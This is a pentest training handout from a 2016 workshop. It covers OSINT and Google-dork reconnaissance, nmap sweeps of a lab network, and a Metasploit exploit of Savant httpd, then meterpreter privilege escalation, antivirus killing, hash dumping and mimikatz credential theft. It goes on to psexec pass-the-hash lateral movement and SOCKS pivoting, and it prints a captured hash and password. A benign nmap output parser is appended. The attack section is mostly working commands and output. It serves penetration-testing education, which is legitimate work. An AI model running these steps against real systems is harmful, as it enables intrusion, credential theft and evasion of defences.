################################
# Pentester Night School 2016  #
# By Joe McCray                #
################################

##########
# VMWare #
##########

- For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player.
- Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.

##########################
# Download the attack VM #
##########################

VM for these labs
-----------------
https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
user: strategicsec
pass: strategicsec

---------------------------------------------------------------------------------------------------------------------------------

################################
# Tactical Pentest Methodology #
################################

The purpose of this section of the Pastebin document is to provide you with a tactical pentest plan.

-=-=-=-=-=-
Phase 1
-=-=-=-=-=-

##########################################
# Step 1: External Target Identification #
##########################################

Find all of the IP ranges owned by your target company via the following websites:
- https://www.robtex.com/
- http://toolbar.netcraft.com/site_report

Look for weak SSL implementations:
- https://www.ssllabs.com/ssltest/

#############################
# Step 2: Google Quick Hits #
#############################

Be thorough, and really look for vulnerabilities and data leakages that are relevant to what you learned while doing your OSINT work.

https://www.exploit-db.com/google-hacking-database/

Really good google dorks to use:
site:yourtarget.com filetype:pcf
site:yourtarget.com filetype:ica

1. Footholds:
-------------
https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=1&ghdb_search_text=
Be sure to use 'site:yourtarget.com' [ google dork for the site above ]

2. Passwords:
-------------
https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=9&ghdb_search_text=
Be sure to use 'site:yourtarget.com' [ google dork for the site above ]

3. Sensitive Directories:
-------------------------
https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=3&ghdb_search_text=
Be sure to use 'site:yourtarget.com' [ google dork for the site above ]

Make sure that you do at least 50-100 different Google dorks. Do no less than 10 dorks per category.

###########################
# Step 3: Compromise Data #
###########################

Look to see if they have already been breached.

Search for the target company (and their major competitors) in the Data Breach Database:
http://www.privacyrights.org/data-breach

Place targetcompany.com in the search box of the link below to look for known breaches:
http://zone-h.com/search

Replace targetcompany.com with your target domain name to look for known XSS vulnerabilities in the site:
http://xssed.com/search?key=targetcompany.com

##############################
# Step 4: Build OSINT Report #
##############################

Passive Recon
-------------
Install this add-on and enumerate as much info as possible:
- https://addons.mozilla.org/en-US/firefox/addon/passiverecon/

Next we build an OSINT report with the data gleaned from the previous steps:
https://s3.amazonaws.com/StrategicSec-Files/OSINT_Innophos_11242010.doc

We look through this report to get an idea not only of what is involved in doing passive recon, but of what the actual output of the work should look like.
---------------------------------------------------------------------------------------------------------------------------------

-=-=-=-=-=-
Phase 2
-=-=-=-=-=-

(The attack VM is the same one downloaded at the top of this document.)

############################################
# Identifying External Security Mechanisms #
############################################

sudo /sbin/iptables -F
strategicsec                <-- sudo password for the attack VM

cd /home/strategicsec/toolz

###########################
# Target IP Determination #
###########################

cd /home/strategicsec/toolz
perl blindcrawl.pl -d targetcompany.com

-- Take each IP address and look it up here:
http://www.networksolutions.com/whois/index.jsp

cd ~/toolz/fierce2
fierce -dns targetcompany.com
cd ..

cd ~/toolz/
./ipcrawl 148.87.1.1 148.87.1.254          (DNS forward lookup against an IP range)

sudo nmap -sL 148.87.1.0-255
strategicsec

sudo nmap -sL 148.87.1.0-255 | grep oracle
strategicsec

sudo nmap -p 443,444,8443,8080,8088 --script=ssl-cert --open 148.87.1.0-255
strategicsec

Reference:
http://blog.depthsecurity.com/2012/01/obtaining-hostdomain-names-through-ssl.html

###########################
# Load Balancer Detection #
###########################

Here are some command-line options to use for identifying load balancers:

dig google.com

cd ~/toolz
./lbd-0.1.sh targetcompany.com

halberd targetcompany.com

######################################
# Web Application Firewall Detection #
######################################

cd ~/toolz/wafw00f
python wafw00f.py http://www.targetcompany.com

cd ~/toolz/
sudo nmap -p 80 --script http-waf-detect.nse targetcompany.com
strategicsec

---------------------------------------------------------------------------------------------------------------------------------

-=-=-=-=-=-
Phase 3
-=-=-=-=-=-

Let's have you connect to the VPN.

I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack. If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover. So, let's start with some lab fun (just a little bit)...lol.

Here are the instructions for connecting to the VPN:
https://s3.amazonaws.com/StrategicSec-Files/Strategic-Security-2016-VPN-Info.pdf

sudo nmap -sP 10.0.0.0/24
sudo nmap -sL 10.0.0.0/24

cd ~/toolz
wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
gcc ipcrawl.c -o ipcrawl
chmod 777 ipcrawl
./ipcrawl 10.0.0.1 10.0.0.254

wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
gcc propecia.c -o propecia
propecia                                   <-- run with no arguments to see the usage
sudo cp propecia /bin
propecia 10.0.0 22
propecia 10.0.0 3389

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | grep open
nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2 " " $3}'
nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' | wc -l
nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}'
nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt

cd ~/toolz
wget http://wkhtmltopdf.googlecode.com/files/wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
tar -jxvf wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
sudo cp wkhtmltoimage-i386 /usr/local/bin/

git clone git://github.com/SpiderLabs/Nmap-Tools.git
cd Nmap-Tools/NSE/
sudo cp http-screenshot.nse /usr/share/nmap/scripts/
sudo nmap --script-updatedb

cd ~/toolz/
mkdir labscreenshots
cd labscreenshots/

sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 10.0.0.0/24 -iL /home/strategicsec/labnet-ip-list.txt

vi screenshots.sh

#!/bin/bash
# Build a single HTML page that shows every screenshot the http-screenshot NSE
# script saved in this directory. The script names its files <ip>:<port>.png,
# so awk splits on ':' and writes a caption plus an <IMG> tag per file
# (the ':' in the filename is URL-encoded as %3A in the SRC attribute).
printf "<HTML><BODY><BR>" > labnet-port-80-screenshots.html
ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html
printf "</BODY></HTML>" >> labnet-port-80-screenshots.html

sh screenshots.sh

##########################
# Nmap NSE tricks to try #
##########################

sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.0/24

sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.0.0.0/24

sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 10.0.0.0/24

sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.0/24

sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.0.0.0/24

sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.0.0.0/24

sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 10.0.0.0/24

sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.0.0.0/24

sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.0.0.0/24

sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 10.0.0.0/24

sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 10.0.0.0/24

sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 10.0.0.0/24

####################################
# Finally, let's exploit something #
####################################

nmap -Pn -sV -T 5 -oG - -p 80,8080 10.0.0.* | awk '/open/{print $2}'

nmap -Pn -sV -T 5 -p 80,8080 10.0.0.15

https://www.exploit-db.com/search

Search for:
Savant httpd 3.1
Apache httpd 2.0.58 ((Win32))

Found one written in Python:
https://www.exploit-db.com/exploits/18401/

Found one for Savant 3.1 from Metasploit:
https://www.exploit-db.com/exploits/16770/

cd ~/toolz/metasploit
./msfconsole

use exploit/windows/http/savant_31_overflow
set RHOST 10.0.0.15
set PAYLOAD windows/meterpreter/bind_nonx_tcp
set RPORT 80
set LPORT 7777
exploit

**********************************
Figure out who and where you are
**********************************
meterpreter> sysinfo
meterpreter> getuid
meterpreter> ipconfig
meterpreter> run post/windows/gather/checkvm
meterpreter> run get_local_subnets

**********************************
Escalate privileges and get hashes
**********************************
meterpreter> use priv
meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
--------------------------------------------------------

meterpreter> run killav
meterpreter> run post/windows/gather/hashdump

Got the following admin hash:
Administrator:500:6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363:::

meterpreter> run post/windows/gather/credentials/credential_collector

meterpreter > load mimikatz
meterpreter > kerberos

This should give me the administrative password: )K5?Jocb(Yx

**********************************
Enumerate the host you are on
**********************************
meterpreter> run winenum
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/usb_history
meterpreter > run post/windows/gather/enum_shares
meterpreter > run post/windows/gather/enum_snmp
meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

**********************************
Get out of Meterpreter
**********************************
meterpreter> background
msf exploit(savant_31_overflow) > back
msf>

**********************************
Lateral Movement
**********************************
Now we can run the PSEXEC exploit.

-- Option 1:
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass )K5?Jocb(Yx
set RHOST 10.0.0.15
set payload windows/meterpreter/bind_tcp
set LPORT 2345
exploit

**********************************
Get out of Meterpreter
**********************************
meterpreter> background
msf exploit(psexec) > back
msf>

**********************************
-- Option 2:
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass 6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363
set payload windows/meterpreter/bind_tcp
set RHOST 10.0.0.15
set LPORT 5678
exploit

**********************************
Set up your Pivot
**********************************
meterpreter > background                <-- background the session

You want to get back to this prompt:
msf exploit(handler) > back             <--- you need to get to the main msf> prompt

sessions -l                             <-- find a session you want to pivot through (note the IP and session number)

Now set up the pivot with a route add
-------------------------------------
route print                             <--- should be blank
route add 10.0.0.15 255.255.255.0 1     <-- Use the correct session id (2), it may be 3, or 4 (make sure you are on the msf> prompt, not meterpreter)
route print                             <----- verify the new route

**********************************
Scan through your Pivot
**********************************
use auxiliary/scanner/portscan/tcp      <-- Run aux modules through your pivot
set THREADS 10
set RHOSTS 10.0.0.0/24                  <-- Keep changing this IP and re-running the scan until you find something you want to attack
set PORTS 445
run

####################################
# Socks Tunneling with Proxychains #
####################################

--- Open a duplicate putty session to your Ubuntu host

sudo apt-get install -y proxychains
strategicsec

sudo vi /etc/proxychains.conf           <--- Make sure that the last line of the file is: socks4 127.0.0.1 1080

Comment out the proxy_dns line, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it.
socks4 127.0.0.1 1080

**********************************
Set up a Socks Proxy through your Pivot
**********************************
use auxiliary/server/socks4a
set SRVHOST 127.0.0.1
set SRVPORT 1080
run

--- Go back to your other putty session with the meterpreter shell

cd ~
proxychains nmap -sT -Pn -vv -sV --script=smb-os-discovery.nse -p 445 192.168.153.0/24          <--- This is going to be really slow

proxychains nmap -sT -Pn -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.0.0.0/24     <--- This is going to be really slow

--- close the duplicate putty session to your Ubuntu host
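The Phase 3 host-list pipelines (`nmap ... -oG - | awk '/open/{print $2}'`) have a pitfall worth knowing before you hand the list to the screenshot or NSE sweeps: `grep open` and `/open/` fire on any "Host:" line that contains the word anywhere, so a UDP `open|filtered` state or a version string such as "OpenSSH" puts a host on the list even when nothing is actually open. The parser below is an added example, not part of the course or its attack VM; it reads nmap's grepable (-oG) "Host:" lines, which are tab-separated into sections and list ports as port/state/protocol/owner/service/rpcinfo/version/, and only counts a port when its state field is exactly "open". The scan output it runs on is constructed to look like the lab scans above.

```python
"""Parse nmap grepable (-oG) output into per-host open-port records.

Added example for the course notes above (not the course's own tooling).
Stand-in for `awk '/open/{print $2}'`: understands the -oG "Host:" line
layout and counts a port only when its state is exactly "open".
"""
import re
from collections import defaultdict

# Constructed sample of what
#   nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.*
# might print for three lab hosts.  Sections of a Host: line are tab separated.
SAMPLE_OG = """\
# Nmap 7.01 scan initiated Thu Jan 14 20:31:12 2016 as: nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.*
Host: 10.0.0.15 ()\tStatus: Up
Host: 10.0.0.15 ()\tPorts: 21/closed/tcp//ftp///, 22/closed/tcp//ssh///, 80/open/tcp//http//Savant httpd 3.1/, 443/closed/tcp//https///, 1433/open/tcp//ms-sql-s//Microsoft SQL Server 2005/, 3389/open/tcp//ms-wbt-server//Microsoft Terminal Service/
Host: 10.0.0.22 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 5.3/, 80/open|filtered/tcp//http///\tIgnored State: closed (3)
Host: 10.0.0.40 ()\tPorts: 21/closed/tcp//ftp///, 22/filtered/tcp//ssh///\tIgnored State: closed (4)
# Nmap done at Thu Jan 14 20:31:40 2016 -- 256 IP addresses (3 hosts up) scanned in 28.13 seconds
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")
# One -oG port entry: port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


def parse_grepable(text):
    """Return {ip: [(port, proto, service, version), ...]} for ports whose
    state field is exactly 'open'.  Hosts with no open ports are omitted, and
    'open|filtered' (the UDP ambiguity) is NOT treated as open."""
    results = defaultdict(list)
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                      # "# Nmap ..." comment and summary lines
        sections = line.split("\t")
        m = HOST_RE.match(sections[0])
        if not m:
            continue
        ip = m.group(1)
        for section in sections[1:]:
            if not section.startswith("Ports:"):
                continue                  # "Status: Up", "Ignored State: ..." etc.
            for port, state, proto, _owner, service, _rpc, version in PORT_RE.findall(section):
                if state == "open":
                    results[ip].append((int(port), proto, service, version))
    return dict(results)


def open_hosts(text):
    """Sorted IPs with at least one open port: what `awk '/open/{print $2}'` was meant to give."""
    return sorted(parse_grepable(text), key=lambda ip: tuple(int(o) for o in ip.split(".")))


def count_open_hosts(text):
    """The `| wc -l` equivalent."""
    return len(open_hosts(text))


def write_host_list(text, path):
    """Write one IP per line, like `> ~/labnet-ip-list.txt`; returns the host count."""
    hosts = open_hosts(text)
    with open(path, "w") as fh:
        fh.write("\n".join(hosts) + ("\n" if hosts else ""))
    return len(hosts)


if __name__ == "__main__":
    # Feed real output with:  nmap -Pn -sV -oG - <targets> | python3 this_script.py
    import sys
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_OG
    for ip, ports in parse_grepable(data).items():
        for port, proto, service, version in ports:
            print(f"{ip} {port}/{proto} {service} {version}".rstrip())
    print(f"{count_open_hosts(data)} host(s) with open ports")
```

Run against the built-in sample, 10.0.0.22 is listed for its ftp and ssh ports only, 10.0.0.40 (nothing open) is left out, and the `80/open|filtered` entry is ignored even though a bare `grep open` would have matched it.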